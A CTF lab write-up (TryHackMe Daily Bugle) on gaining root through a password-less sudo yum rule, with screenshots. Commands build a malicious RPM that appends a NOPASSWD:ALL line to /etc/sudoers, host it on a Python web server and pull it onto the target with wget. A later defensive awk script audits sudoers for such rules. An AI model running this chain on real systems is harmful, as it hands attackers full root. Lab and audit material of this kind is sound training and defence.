# Sudoers entry - Yum

While doing a CTF on TryHackMe (dailybugle), I found that my current user (jjameson) was allowed to run **/usr/bin/yum** as root without a password. Please read the previous post to find out what "sudoers" is.

<div align="left"><img src="https://62284611-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MSvRnuhl_P5WCd1fZEn%2Fuploads%2FdF4pDeUAHErjHgimC2Jq%2Fimage.png?alt=media&#x26;token=025439e3-52bd-487d-976c-19d53a9a3a68" alt=""></div>

With the help of [GTFOBins](https://gtfobins.github.io/gtfobins/yum/), we found a method to elevate privileges using yum.

<div align="left"><img src="https://62284611-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MSvRnuhl_P5WCd1fZEn%2Fuploads%2FkpTcPLauyOntx6zyPh7X%2Fimage.png?alt=media&#x26;token=e565af01-d46d-47e4-b616-c3b0c721c980" alt=""></div>

The process is simple enough:

1. Create a shell script with the code you want to execute (it will hold our malicious code).
2. Make an RPM package from it using the [fpm](https://fpm.readthedocs.io/en/latest/installation.html) tool.
3. Upload the package to the victim machine.
4. Execute it using the yum command.

Note: on Red Hat/CentOS, yum is the package manager, which is why the payload has to be built as an RPM. A similar case exists for Debian/Ubuntu systems, where we'll use apt-get to elevate privileges.

**`gem install fpm`**

**`apt install rpm`**

Here, I'll be adding my current user to the sudoers file for privilege escalation. This is by far the easiest method I have discovered.

**`echo 'echo "jjameson ALL=(root) NOPASSWD:ALL" >> /etc/sudoers' > my.sh`**

<div align="left"><img src="https://62284611-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MSvRnuhl_P5WCd1fZEn%2Fuploads%2FpRQ5mAISzx7jqK49DrfA%2Fimage.png?alt=media&#x26;token=8cf48b98-bdf9-4be1-a259-4c2662821df4" alt=""></div>

**`fpm -n root -s dir -t rpm -a all --before-install my.sh .`**

<div align="left"><img src="https://62284611-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MSvRnuhl_P5WCd1fZEn%2Fuploads%2FmyXBVfwrgxnfzb6fET5c%2Fimage.png?alt=media&#x26;token=77745e28-64d7-4247-8cc4-7e69a21b010c" alt=""></div>

Launch a Python server now:

**`python3 -m http.server 80`**

On the victim machine, download the package into the /tmp directory and install it with the following commands:

**`wget <ip>/root-1.0-1.noarch.rpm`**

**`sudo yum localinstall -y root-1.0-1.noarch.rpm`**

<div align="left"><img src="https://62284611-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MSvRnuhl_P5WCd1fZEn%2Fuploads%2FpmHlMCuxrc2Lbf8hRtjX%2Fimage.png?alt=media&#x26;token=57d3bce9-c36f-4c39-b444-14350160e675" alt=""></div>

Once the installation has completed successfully, run a simple bash shell using sudo (**sudo bash**). You'll observe that jjameson doesn't require a password to run anything as root, because our script "my.sh" was executed as root as part of the RPM package we just created. This is how we escalate our privileges using yum.

<div align="left"><img src="https://62284611-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MSvRnuhl_P5WCd1fZEn%2Fuploads%2Fxd4SV4osAtXWqg4ZshR2%2Fimage.png?alt=media&#x26;token=7733676b-a4fb-4a68-b5f5-016331834fc5" alt=""></div>
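From the defender's side, the precondition for everything above is a sudoers rule that lets a user run a package manager as root, and the visible result is a blanket NOPASSWD line appended to /etc/sudoers. The audit script below is an added example, not part of the original write-up; the sample file and function names are constructed, and checking dnf, rpm, apt and dpkg alongside yum goes beyond the specific case shown here.

```shell
#!/bin/sh
# Added example (defensive audit). The sample below is constructed, not copied
# from the target machine in the write-up.
sample_sudoers() {
cat <<'EOF'
# constructed sample
Defaults   env_reset
root       ALL=(ALL) ALL
jjameson   ALL=(ALL) NOPASSWD: /usr/bin/yum
deploy     ALL=(root) /usr/bin/systemctl restart httpd, /usr/bin/rpm
jjameson ALL=(root) NOPASSWD:ALL
EOF
}

# Reads sudoers text on stdin; prints one finding per line:
#   PKGMGR  <who> <path> <NOPASSWD|PASSWD>   package manager runnable via sudo
#   BLANKET <who> ALL NOPASSWD               password-less full root
# Simplifications: aliases and #include files are not resolved, and a
# NOPASSWD tag anywhere on the line is treated as covering the whole line.
audit_sudoers() {
  awk '
    /^[ \t]*#/ || /^[ \t]*$/ { next }             # comments, blanks
    /^[ \t]*(Defaults|[A-Za-z]+_Alias)/ { next }  # settings, alias definitions
    index($0, "=") == 0 { next }
    {
      who  = $1
      spec = substr($0, index($0, "=") + 1)
      tag  = (spec ~ /NOPASSWD:/) ? "NOPASSWD" : "PASSWD"
      gsub(/\([^)]*\)/, "", spec)                 # drop runas, e.g. (root)
      gsub(/[A-Z_]+:[ \t]*/, "", spec)            # drop tags, e.g. NOPASSWD:
      n = split(spec, cmds, ",")
      for (i = 1; i <= n; i++) {
        c = cmds[i]
        sub(/^[ \t]+/, "", c); sub(/[ \t]+$/, "", c)
        split(c, words, /[ \t]+/); path = words[1]
        m = split(path, parts, "/"); base = parts[m]
        if (base ~ /^(yum|dnf|rpm|apt|apt-get|dpkg)$/)
          print "PKGMGR", who, path, tag
        else if (c == "ALL" && tag == "NOPASSWD")
          print "BLANKET", who, "ALL", tag
      }
    }'
}

sample_sudoers | audit_sudoers
```

On a real host, feed the function the contents of /etc/sudoers and the files under /etc/sudoers.d instead of the sample.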
